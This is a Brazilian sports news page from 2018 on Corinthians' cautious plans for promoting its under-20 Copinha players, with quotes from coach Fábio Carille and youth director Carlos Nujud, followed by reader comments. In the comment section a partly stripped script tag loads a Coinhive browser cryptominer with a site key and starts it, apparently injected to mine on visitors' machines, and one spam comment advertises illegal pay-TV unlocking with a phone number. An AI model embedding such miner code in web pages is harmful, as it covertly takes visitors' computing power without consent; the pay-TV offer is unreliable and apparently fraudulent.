19/1/2018 10:00

Vão subir? Veja os planos do Corinthians para os jogadores da Copinha

Timãozinho foi eliminado nas oitavas de final do torneio sub-20

Vão subir? Veja os planos do Corinthians para os jogadores da Copinha
Foto: Marcelo Braga

Diferentemente do ano passado, quando logo após o fim da Copa São Paulo de Juniores alguns jogadores foram promovidos ao elenco profissional (casos de Pedrinho, Carlinhos e Mantuan, por exemplo), o Corinthians adota cautela na transição dos atletas do sub-20 para a equipe principal.



Por ora, o clube não pretende "subir" ninguém. Isso, porém, não significa que o técnico Fábio Carille e sua comissão técnica não vejam jovens promissores na equipe que foi eliminada nas oitavas de final da Copinha para o Avaí.

O Timão entende que precisa primeiro abrir vagas no elenco profissional, que conta atualmente com 38 atletas, número considerado alto.

Além disso, já há jovens atletas no grupo que estão sem espaço, como o meia Rodrigo Figueiredo, que deve ser emprestado ao Londrina, e o lateral-direito Léo Príncipe, que também não foi inscrito no Campeonato Paulista.

– Vamos esperar mais um pouco, são jogadores jovens. Eu estou com muito jovens no grupo, gosto de trabalhar com jovens. Mas não adianta ter eles aqui e muitas vezes eles nem participarem dos treinos. Vamos ter muitos cuidados com isso, mas a possibilidade existe para todos – comentou o técnico Fábio Carille, na última terça-feira.

Todos os jogadores que dipustaram a Copa São Paulo pelo Corinthians ainda têm idade para jogarem outras competições de juniores, como Paulista, Brasileiro e Copa do Brasil.

Dentre os que mais chamam a atenção da comissão técnica e que estão próximos de atingirem o limite de idade do sub-20, estão o zagueiro João (que treinou com o elenco profissional na última quinta-feira), o lateral-direito Samuel e o volante Renan Areias. Há também outros mais novos, como o lateral-esquerdo Carlos e o meia Fabrício Oya, que agradam a Carille e seus auxiliares. Vitinho, outra joia do clube, tem apenas 18 anos e pode seguir na base para adquirir experiência.

Carlos Nujud, diretor do departamento de formação de atletas do Corinthians, diz que alguns garotos estão "no radar" do time profissional, mas não descarta a possibilidade de emprestá-los a outros clubes.

– Nossa ideia é dar rodagem a estes jogadores. Pode ser que a gente faça como foi com o Guilherme Romão, que foi emprestado ao Oeste no ano passado, com cláusula de retorno a qualquer momento, e este ano está no profissional – explicou.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Juventude
- Corinthians e Atlético-MG empatam na estreia do Brasileirão
- Timão escalado para o jogo contra o Atlético-MG









10962 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Vamos meter a mão no Bolso e contratar Ricardo Goulart p/ centravante,

pra promover da base só si for o menino fabricio óya este tem visão de futebol os demas manda pra outros times não mostrou vontade todos ruimmm

este pessoal da base devem ser cegos este Vitinho e Renam não sabem dominar uma bola.

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade